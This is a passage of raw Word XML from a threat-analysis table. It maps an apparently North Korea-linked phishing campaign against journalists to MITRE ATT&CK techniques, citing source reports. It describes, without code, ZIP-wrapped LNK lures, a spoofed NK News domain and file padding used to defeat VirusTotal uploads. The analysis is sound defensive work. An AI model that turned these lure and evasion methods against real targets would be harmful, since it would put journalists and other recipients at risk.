                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D70744B" w14:textId="6FD70A9E" w:rsidR="002F7B21" w:rsidRPr="00E34A89" w:rsidRDefault="000D7212" w:rsidP="002F7B21">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E2A5ADB" w14:textId="77777777" w:rsidR="002F7B21" w:rsidRPr="00E34A89" w:rsidRDefault="002F7B21" w:rsidP="002F7B21">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79EC55D4" w14:textId="38B2D629" w:rsidR="002F7B21" w:rsidRPr="00E34A89" w:rsidRDefault="002F7B21" w:rsidP="002F7B21">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E34A89">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AA590C9" w14:textId="54C47648" w:rsidR="002F7B21" w:rsidRPr="00E34A89" w:rsidRDefault="00FF5990" w:rsidP="002F7B21">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12B03454" w14:textId="77777777" w:rsidR="002F7B21" w:rsidRPr="00E34A89" w:rsidRDefault="000E7841" w:rsidP="002F7B21">
            <w:r w:rsidRPr="00E34A89">
              <w:t>[5] The messages were sent from the personal email of a former director of South Korea’s National Intelligence Service, NIS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="453CC0B1" w14:textId="77777777" w:rsidR="00194A2C" w:rsidRPr="00E34A89" w:rsidRDefault="00194A2C" w:rsidP="002F7B21">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3CB06914" w14:textId="6165D677" w:rsidR="00194A2C" w:rsidRPr="00E34A89" w:rsidRDefault="00194A2C" w:rsidP="002F7B21">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E34A89">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NOTE: In [6] (and others) this appears to be described as an attachment but this sequence reflects the initial steps in this report</w:t>
            </w:r>
            <w:r w:rsidR="002812D8" w:rsidRPr="00E34A89">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> (and [7])</w:t>
            </w:r>
            <w:r w:rsidRPr="00E34A89">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>. [6] is used for more detail on the stages of the malware installation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E7841" w:rsidRPr="00B857D7" w14:paraId="5C7E3784" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A67E113" w14:textId="251E63BB" w:rsidR="000E7841" w:rsidRDefault="000E7841" w:rsidP="00762056">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E324748" w14:textId="77777777" w:rsidR="000E7841" w:rsidRPr="00B857D7" w:rsidRDefault="000E7841" w:rsidP="00762056">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293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09E56389" w14:textId="1E11E88C" w:rsidR="000E7841" w:rsidRPr="00B857D7" w:rsidRDefault="000E7841" w:rsidP="00762056">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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>189</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Drive By Compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40283219" w14:textId="278BDCA6" w:rsidR="000E7841" w:rsidRPr="00B857D7" w:rsidRDefault="00927653" w:rsidP="00762056">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6116ACD1" w14:textId="77777777" w:rsidR="000E7841" w:rsidRPr="00B857D7" w:rsidRDefault="000E7841" w:rsidP="00762056">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DF0AF8F" w14:textId="77777777" w:rsidR="000E7841" w:rsidRDefault="000E7841" w:rsidP="00762056">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="558BCE6D" w14:textId="0FFA9BD9" w:rsidR="000E7841" w:rsidRPr="00B857D7" w:rsidRDefault="00FF5990" w:rsidP="00762056">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEL/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="278EB37C" w14:textId="06E79CA2" w:rsidR="000E7841" w:rsidRPr="000E7841" w:rsidRDefault="000E7841" w:rsidP="000E7841">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[5] </w:t>
            </w:r>
            <w:r w:rsidRPr="000E7841">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>In stage one, a victim must download a ZIP file from a compromised site, which executes a compressed Windows shortcut.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28886D0C" w14:textId="77777777" w:rsidR="000E7841" w:rsidRPr="000E7841" w:rsidRDefault="000E7841" w:rsidP="000E7841">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6F7AFE64" w14:textId="2D0ABC17" w:rsidR="000E7841" w:rsidRPr="000E7841" w:rsidRDefault="000E7841" w:rsidP="000E7841">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000E7841">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>“The domain was likely chosen to impersonate NK News</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E34A89" w:rsidRPr="00E34A89" w14:paraId="09D80C4A" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DCB6985" w14:textId="612E8C11" w:rsidR="00F32000" w:rsidRPr="00E34A89" w:rsidRDefault="00E34A89" w:rsidP="00E93312">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F9C0E92" w14:textId="77777777" w:rsidR="00F32000" w:rsidRPr="00E34A89" w:rsidRDefault="00F32000" w:rsidP="00E93312">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E34A89">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E34A89">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E34A89">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00E7EF87" w14:textId="19F94BCC" w:rsidR="00F32000" w:rsidRPr="00E34A89" w:rsidRDefault="00F32000" w:rsidP="00E93312">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00E34A89">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1204.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00E34A89">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> User Execution : Malicious Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CDCC484" w14:textId="02B3027B" w:rsidR="00F32000" w:rsidRPr="00E34A89" w:rsidRDefault="00B55E08" w:rsidP="00E93312">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C6BD7D2" w14:textId="77777777" w:rsidR="00F32000" w:rsidRPr="00E34A89" w:rsidRDefault="00F32000" w:rsidP="00E93312">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70434663" w14:textId="77777777" w:rsidR="00F32000" w:rsidRPr="00E34A89" w:rsidRDefault="00F32000" w:rsidP="00E93312">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E34A89">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FF03F85" w14:textId="087A76BB" w:rsidR="00F32000" w:rsidRPr="00E34A89" w:rsidRDefault="00FF5990" w:rsidP="00E93312">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-SEN/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EC1BF63" w14:textId="0A03672F" w:rsidR="00F32000" w:rsidRPr="00E34A89" w:rsidRDefault="00673BB2" w:rsidP="00E93312">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[7] </w:t>
            </w:r>
            <w:r w:rsidRPr="00F32000">
              <w:t>The emails sent to the journalists contained a link to download ZIP archives that had LNK files, both named 'Kang Min-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F32000">
              <w:t>chol</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F32000">
              <w:t xml:space="preserve"> edits'. Kang Min-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F32000">
              <w:t>chol</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F32000">
              <w:t xml:space="preserve"> is North Korea’s Minister of Mining Industries.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B9179C" w:rsidRPr="005027B7" w14:paraId="624CAE98" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5326ACDE" w14:textId="546D105D" w:rsidR="00C518A9" w:rsidRPr="005027B7" w:rsidRDefault="005027B7" w:rsidP="008A4AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DC29B51" w14:textId="2CE1259F" w:rsidR="00C518A9" w:rsidRPr="005027B7" w:rsidRDefault="005027B7" w:rsidP="008A4AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">TA0005: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DCD1DA8" w14:textId="763A9929" w:rsidR="00C518A9" w:rsidRPr="005027B7" w:rsidRDefault="00C518A9" w:rsidP="008A4AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005027B7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1036</w:t>
            </w:r>
            <w:r w:rsidR="005027B7" w:rsidRPr="005027B7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Masquerading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40F7AED1" w14:textId="1B2BAD69" w:rsidR="00C518A9" w:rsidRPr="005027B7" w:rsidRDefault="005027B7" w:rsidP="008A4AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005027B7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78FA5A45" w14:textId="77777777" w:rsidR="00C518A9" w:rsidRPr="005027B7" w:rsidRDefault="00C518A9" w:rsidP="008A4AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3765FACF" w14:textId="75A86397" w:rsidR="00C518A9" w:rsidRPr="005027B7" w:rsidRDefault="005027B7" w:rsidP="008A4AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005027B7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E53A6D9" w14:textId="69BBA61B" w:rsidR="00C518A9" w:rsidRPr="005027B7" w:rsidRDefault="00FF5990" w:rsidP="008A4AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A34AFE5" w14:textId="1F18341E" w:rsidR="00C518A9" w:rsidRPr="005027B7" w:rsidRDefault="005027B7" w:rsidP="008A4AE0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005027B7">
              <w:t>[5] The LNK file (Windows shortcut) is masqueraded with a document icon and uses padding to artificially increase its size to 282.7 MB, hindering easy uploads to Virus Total and other online detection tools.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DA5851" w:rsidRPr="00DA5851" w14:paraId="7F063D99" w14:textId="77777777" w:rsidTr="00EC2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D4E43A4" w14:textId="1B277912" w:rsidR="00DA5851" w:rsidRPr="00DA5851" w:rsidRDefault="00DA5851" w:rsidP="00417B09">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA5851">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E85CEE7" w14:textId="77777777" w:rsidR="00DA5851" w:rsidRPr="00DA5851" w:rsidRDefault="00DA5851" w:rsidP="00417B09">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA5851">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">TA0005: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DA5851">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DA5851">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2293" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E5F7C6F" w14:textId="1E07C07F" w:rsidR="00DA5851" w:rsidRPr="00DA5851" w:rsidRDefault="00DA5851" w:rsidP="00417B09">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA5851">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DA5851">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1027 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DA5851">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6035ACBA" w14:textId="77777777" w:rsidR="00DA5851" w:rsidRPr="00DA5851" w:rsidRDefault="00DA5851" w:rsidP="00417B09">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA5851">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="616" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="063045E6" w14:textId="77777777" w:rsidR="00DA5851" w:rsidRPr="00DA5851" w:rsidRDefault="00DA5851" w:rsidP="00417B09">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04F6325E" w14:textId="77777777" w:rsidR="00DA5851" w:rsidRPr="00DA5851" w:rsidRDefault="00DA5851" w:rsidP="00417B09">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA5851">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73F70142" w14:textId="4CDBC72C" w:rsidR="00DA5851" w:rsidRPr="00DA5851" w:rsidRDefault="00EC2E4B" w:rsidP="00417B09">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3516" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65F83B42" w14:textId="5375BC88" w:rsidR="00DA5851" w:rsidRPr="00DA5851" w:rsidRDefault="00DA5851" w:rsidP="00417B09">
            <w:pPr>
              <w:rPr>
